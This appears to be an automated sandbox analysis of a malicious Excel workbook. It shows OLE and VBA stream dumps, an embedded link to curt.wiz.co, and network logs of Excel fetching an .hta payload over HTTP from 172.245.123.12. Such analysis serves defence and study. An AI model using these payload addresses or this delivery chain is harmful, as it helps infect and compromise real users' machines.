        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD010681DC/MBD007203CB/Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:134792
        Entropy:7.974168320310173
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:468
        Entropy:5.269289820125323
        Base64 Encoded:True
        Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
        Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:83
        Entropy:3.0672749060249043
        Base64 Encoded:False
        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2486
        Entropy:3.9244127831265385
        Base64 Encoded:False
        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
        CLSID:
        File Type:data
        Stream Size:536
        Entropy:6.330646364694152
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
        Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
        General
        Stream Path:MBD010681DC/MBD00726B69/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.219515110876372
        Base64 Encoded:False
        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD00726B69/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:26242
        Entropy:7.635424485665502
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:283872
        Entropy:7.743278150467805
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
        General
        Stream Path:MBD010681DD/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DD/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:45934
        Entropy:7.5587990853484195
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DE/\x1Ole
        CLSID:
        File Type:data
        Stream Size:560
        Entropy:5.607558056244155
        Base64 Encoded:False
        Data ASCII:. . . . . 0 . . i V . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . V . v . B . B . U . A . l . 9 . T . i . ? . & . c . o . m . p . u . l . s . i . o . n . = . z . e . a . l . o . u . s . & . m . o . o . d . . . 2 . . . h 6 j . l . / . . . . . . . + k . . w ^ E . M Y % q . * 1 W . _ U . . a . ^ 8 U \\ . . h . n 8 . . . [ # . + o $ j = r u ] . . 2 u h . k . N 8 E W I J . . . W . 7 = > 1 . . [ & o % . . . . . . . . . . . . . .
        Data Raw:01 00 00 02 0d 95 30 02 d2 0c 69 56 00 00 00 00 00 00 00 00 00 00 00 00 16 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 12 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 56 00 76 00 42 00 42 00 55 00 41 00 6c 00 39 00 54 00 69 00 3f 00 26 00 63 00 6f 00 6d 00 70 00 75 00 6c 00 73 00 69 00
        General
        Stream Path:Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:316629
        Entropy:7.998637073721496
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . } . . . m v v . i J , . i X ! . N > B = u . ~ G / . . . . . . . . . . t . . . . \\ . p . N 6 P . D J S 6 j b | | > } S - . . j ' 8 . 0 O g / # . ^ h c O ` k . C f n / . 3 _ . . . + G . v o . E _ 0 t D j : / B . . . n a . . . . . . . = . . . x F Q . . . . S } 4 . . 8 . X . . . . A . . . . . . . . . " . . . . = . . . 1 . . . . = . . . 4 . E . m @ . . . x . . . 3 " . . . S . . . . . ~ . . . . . . { . 1 . . . . * . d + . 3 f # ? " 5 s # v N . 1 . . . G .
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 de 86 95 1f 7d 15 00 db e7 01 c7 6d 76 c6 76 19 e3 69 b3 84 bd 4a 2c a8 1c bf 69 58 c0 f1 98 21 1a 4e d9 fd 3e e4 42 3d b4 ce 75 00 bb 7e 47 2f 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 74 00 e2 00 00 00 5c 00 70 00 4e 36 50 03 9f a8 e0 44 be 4a 53 fa 80 36 6a 62 7c 7c c8 3e a3 7d c3 53 bd c8
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:527
        Entropy:5.279649998615774
        Base64 Encoded:True
        Data ASCII:I D = " { 5 2 B 6 0 E C 6 - 0 9 9 E - 4 D 8 C - 8 A 5 B - B 7 8 B 7 D 3 C E C 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B F B D A 1 A E 6 3 5 6 D C 5 A D
        Data Raw:49 44 3d 22 7b 35 32 42 36 30 45 43 36 2d 30 39 39 45 2d 34 44 38 43 2d 38 41 35 42 2d 42 37 38 42 37 44 33 43 45 43 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:104
        Entropy:3.0488640812019017
        Base64 Encoded:False
        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
        General
        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2644
        Entropy:3.982462153871729
        Base64 Encoded:True
        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
        TimestampSource PortDest PortSource IPDest IP
        Dec 16, 2024 17:06:03.104038000 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:03.104053020 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:03.104125977 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:03.104418993 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:03.104429960 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:04.566807032 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:04.567065954 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:04.571760893 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:04.571787119 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:04.572073936 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:04.572144032 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:04.572664022 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:04.615358114 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.067595005 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.067718029 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.067743063 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.067898035 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.068248987 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.068310022 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.068361998 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.072680950 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.072699070 CET44349727170.82.174.30192.168.2.9
        Dec 16, 2024 17:06:06.072711945 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.073932886 CET49727443192.168.2.9170.82.174.30
        Dec 16, 2024 17:06:06.074754953 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:06.194717884 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:06.194837093 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:06.195060968 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:06.315210104 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.317460060 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.317605972 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.317763090 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.317804098 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.317836046 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.317867994 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.318895102 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.318931103 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.318959951 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.318986893 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.320178032 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.320215940 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.320250988 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.320271015 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.321458101 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.321496010 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.321532011 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.321532011 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.322681904 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.322753906 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.437688112 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.437776089 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.438568115 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.438627958 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.512506008 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.512525082 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.512584925 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.513207912 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.514422894 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.514472961 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.514724016 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.514761925 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.522706985 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.522758007 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.523082972 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.523128033 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.531836987 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.531889915 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.532084942 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.532125950 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.539660931 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.539721966 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.540030956 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.540069103 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.541687012 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.541719913 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.548255920 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.548304081 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.548401117 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.548454046 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.555248976 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.555423975 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.555435896 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.555480957 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.563258886 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.563337088 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.563465118 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.563510895 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.571002960 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.571095943 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.571273088 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.571337938 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.579212904 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.579303026 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.579613924 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.579667091 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.586874008 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.586914062 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.587151051 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.587193012 CET4972880192.168.2.9172.245.123.12
        Dec 16, 2024 17:06:07.632368088 CET8049728172.245.123.12192.168.2.9
        Dec 16, 2024 17:06:07.632438898 CET4972880192.168.2.9172.245.123.12
        TimestampSource PortDest PortSource IPDest IP
        Dec 16, 2024 17:06:02.962543011 CET5130453192.168.2.91.1.1.1
        Dec 16, 2024 17:06:03.101044893 CET53513041.1.1.1192.168.2.9
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Dec 16, 2024 17:06:02.962543011 CET192.168.2.91.1.1.10xda12Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Dec 16, 2024 17:06:03.101044893 CET1.1.1.1192.168.2.90xda12No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
        Dec 16, 2024 17:06:03.101044893 CET1.1.1.1192.168.2.90xda12No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
        Dec 16, 2024 17:06:03.101044893 CET1.1.1.1192.168.2.90xda12No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
        Dec 16, 2024 17:06:18.763680935 CET1.1.1.1192.168.2.90x4091No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
        Dec 16, 2024 17:06:18.763680935 CET1.1.1.1192.168.2.90x4091No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
        • curt.wiz.co
        • 172.245.123.12
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.949728172.245.123.12807620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        TimestampBytes transferredDirectionData
        Dec 16, 2024 17:06:06.195060968 CET256OUTGET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Connection: Keep-Alive
        Host: 172.245.123.12
        Dec 16, 2024 17:06:07.317460060 CET1236INHTTP/1.1 200 OK
        Date: Mon, 16 Dec 2024 16:06:07 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
        Last-Modified: Mon, 16 Dec 2024 08:16:25 GMT
        ETag: "241db-6295ecbefb4bc"
        Accept-Ranges: bytes
        Content-Length: 147931
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/hta
